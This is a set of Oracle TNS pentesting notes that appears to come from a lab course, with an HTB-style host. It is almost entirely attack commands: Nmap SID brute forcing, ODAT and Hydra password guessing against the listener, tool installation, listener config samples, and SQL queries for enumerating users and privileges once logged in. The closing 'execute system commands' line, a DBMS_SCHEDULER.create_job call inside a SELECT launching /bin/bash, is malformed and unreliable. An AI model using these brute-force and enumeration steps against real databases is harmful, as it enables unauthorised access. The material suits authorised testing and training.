Oracle TNS Pentesting Notes

# Basic Nmap scan
nmap -p1521 -sV <target>

# Aggressive scan with scripts
nmap -p1521 -sV -sC -A <target>

# All Oracle scripts
nmap -p1521 --script oracle-* <target>

# Using TNSPing
tnsping <target>

# Using Nmap
nmap -p1521 -sV --script oracle-sid-brute <target>

# Using ODAT
./odat.py tnscmd -s <target> -p 1521

# Using ODAT
./odat.py sidguesser -s <target> -p 1521

# Using Nmap
nmap -p1521 --script oracle-sid-brute <target>

# Manual connection
sqlplus scott/tiger@<target>:1521/ORCL

ORCL
XE
PROD
DEV
TEST

# Password guessing
./odat.py passwordguesser -s <target> -p 1521 -d XE

# Dictionary attack
./odat.py passwordguesser -s <target> -p 1521 -d XE --accounts-file accounts.txt

# Test multiple SIDs
./odat.py passwordguesser -s <target> -p 1521 -d ALL

# Basic authentication
hydra -L users.txt -P passwords.txt oracle-listener://<target>

# Target specific SID
hydra -L users.txt -P passwords.txt oracle-sid://<target>/ORCL

# Install ODAT and dependencies
sudo apt-get install libaio1 python3-dev alien -y
git clone https://github.com/quentinhardy/odat.git
cd odat/
git submodule init
git submodule update

# Install Oracle Instant Client
wget https://download.oracle.com/otn_software/linux/instantclient/2112000/instantclient-basic-linux.x64-21.12.0.0.0dbru.zip
wget https://download.oracle.com/otn_software/linux/instantclient/2112000/instantclient-sqlplus-linux.x64-21.12.0.0.0dbru.zip
unzip instantclient-basic-linux.x64-21.12.0.0.0dbru.zip
unzip instantclient-sqlplus-linux.x64-21.12.0.0.0dbru.zip

# Set environment
export LD_LIBRARY_PATH=instantclient_21_12:$LD_LIBRARY_PATH
export PATH=$LD_LIBRARY_PATH:$PATH

# Install Python dependencies
pip3 install cx_Oracle
pip3 install colorlog termcolor passlib python-libnmap pycryptodome

# SID enumeration
nmap -p1521 --script oracle-sid-brute <target>

# TNS version
nmap -p1521 --script oracle-tns-version <target>

# Brute force
nmap -p1521 --script oracle-brute --script-args oracle-brute.sid=ORCL <target>

# Enumerate users
nmap -p1521 --script oracle-enum-users --script-args oracle-enum-users.sid=ORCL <target>

# Listener configuration
$ORACLE_HOME/network/admin/listener.ora

# Security configuration
$ORACLE_HOME/network/admin/sqlnet.ora

# Access control
$ORACLE_HOME/network/admin/protocol.ora

# Connection configuration
$ORACLE_HOME/network/admin/tnsnames.ora

# SQL*Net configuration
$ORACLE_HOME/network/admin/sqlnet.ora

LISTENER =
  (DESCRIPTION_LIST =
    (DESCRIPTION =
      (ADDRESS = (PROTOCOL = TCP)(HOST = orcl.inlanefreight.htb)(PORT = 1521))
      (ADDRESS = (PROTOCOL = IPC)(KEY = EXTPROC1521))
    )
  )

ORCL =
  (DESCRIPTION =
    (ADDRESS_LIST =
      (ADDRESS = (PROTOCOL = TCP)(HOST = 10.129.11.102)(PORT = 1521))
    )
    (CONNECT_DATA =
      (SERVER = DEDICATED)
      (SERVICE_NAME = orcl)
    )
  )

-- Check current user privileges
SELECT * FROM user_role_privs;

-- List all users
SELECT * FROM all_users;

-- View database version
SELECT * FROM v$version;

-- List available databases
SELECT * FROM v$database;

-- Check for DBA role
SELECT * FROM user_role_privs WHERE granted_role='DBA';

-- Execute system commands (if allowed)
SELECT DBMS_SCHEDULER.create_job('CMD','EXECUTABLE','/bin/bash');

-- Check for accessible PL/SQL procedures
SELECT * FROM all_procedures WHERE owner='SYS';